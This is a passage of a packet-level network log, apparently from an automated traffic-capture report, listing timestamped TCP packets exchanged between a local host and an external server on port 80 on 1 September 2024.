Sep 1, 2024 18:28:24.413315058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413320065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413327932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413336039 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413342953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413350105 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413357973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413367033 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413378000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413383007 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413388968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413393974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413408995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413414001 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413419008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413436890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413444042 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413450956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413459063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413467884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413472891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413480997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413487911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413495064 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413508892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413512945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413523912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413527966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413537025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413544893 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413556099 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413561106 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413568974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413573980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413590908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413605928 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413853884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413863897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413872004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413889885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413913012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413985014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413994074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414002895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414014101 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414019108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414028883 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414036989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414043903 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414055109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414058924 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414067030 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414072990 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414084911 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414099932 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414144993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414155006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414164066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414172888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414179087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414186954 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414194107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414201021 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414208889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414216995 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414226055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414230108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414238930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414257050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414302111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414310932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414319038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414328098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414335012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414343119 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414350986 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414362907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414366961 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414374113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414383888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414412022 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414441109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414450884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414474964 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414585114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414594889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414603949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414612055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414618969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414628983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.414635897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.414664984 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.495444059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.495455027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.495465040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.495475054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.495501995 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.495528936 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.539956093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.539964914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.539974928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.539983988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540014982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540040016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540083885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540092945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540102005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540111065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540119886 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540153980 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540265083 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540273905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540282011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540292978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540299892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540307999 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540322065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540328026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540338039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540343046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540365934 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540525913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540534019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540544033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540554047 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540560007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540571928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540579081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540587902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540602922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540616989 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540782928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540791988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540818930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540829897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540911913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540923119 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540930986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540940046 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540947914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540956974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540961981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540971994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.540977001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540985107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.540997982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.541002989 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.541011095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.541019917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.541024923 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.541033030 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.541039944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.541050911 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.541058064 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.541064024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.541070938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.541079998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.541094065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.541107893 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.541291952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.541300058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.541332006 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.582571983 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.587502956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807178974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807198048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807204008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807233095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807255983 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807275057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807285070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807292938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807302952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807308912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807326078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807480097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807490110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807497978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807507038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807512999 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807544947 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807658911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807667017 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807677984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807688951 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807693958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807708979 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807729959 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807845116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807854891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807881117 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807888031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.807964087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807974100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807982922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.807991028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808001041 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808007956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808020115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808027029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808037043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808044910 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808068991 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808106899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808116913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808125973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808135986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808142900 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808154106 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808159113 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808166981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808178902 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808191061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808203936 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808264971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808279037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808288097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808296919 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808303118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808309078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808317900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808324099 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808331966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808337927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808346033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808351994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808360100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808366060 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808374882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808384895 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808393955 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808398008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808408976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808413029 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808430910 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808439016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808872938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808881998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808892012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808897018 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808904886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808917046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808928013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808934927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808942080 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808948994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808955908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808964014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808974028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.808979988 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.808995008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809257030 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809266090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809274912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809288025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809292078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809300900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809309959 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809317112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809328079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809334993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809344053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809350014 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809370995 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809386015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809597015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809606075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809613943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809626102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809629917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809638977 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809648991 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809654951 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809663057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809673071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809680939 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809689999 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809699059 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809704065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809714079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809720039 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809727907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809739113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809746027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809753895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809765100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809772015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.809789896 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.809811115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:25.677237988 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:25.677262068 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:25.682755947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:25.682893991 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:26.143129110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:26.143228054 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:26.660398006 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:26.665235996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:26.886646032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:26.886677027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:26.886687994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:26.886699915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:26.886710882 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:26.886723042 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:26.922219038 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:26.927146912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.160046101 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.160123110 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.206733942 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.211888075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.439651012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.439711094 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.549601078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.549752951 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.554497004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.554645061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.554653883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.554661989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.554668903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.554708004 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.554749012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.554759026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.554804087 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.554884911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.554933071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.554960966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.554970026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.555013895 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.555078030 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.555139065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.559286118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.559333086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.559418917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.559427023 CEST	80	56177	91.202.233.158	192.168.2.4
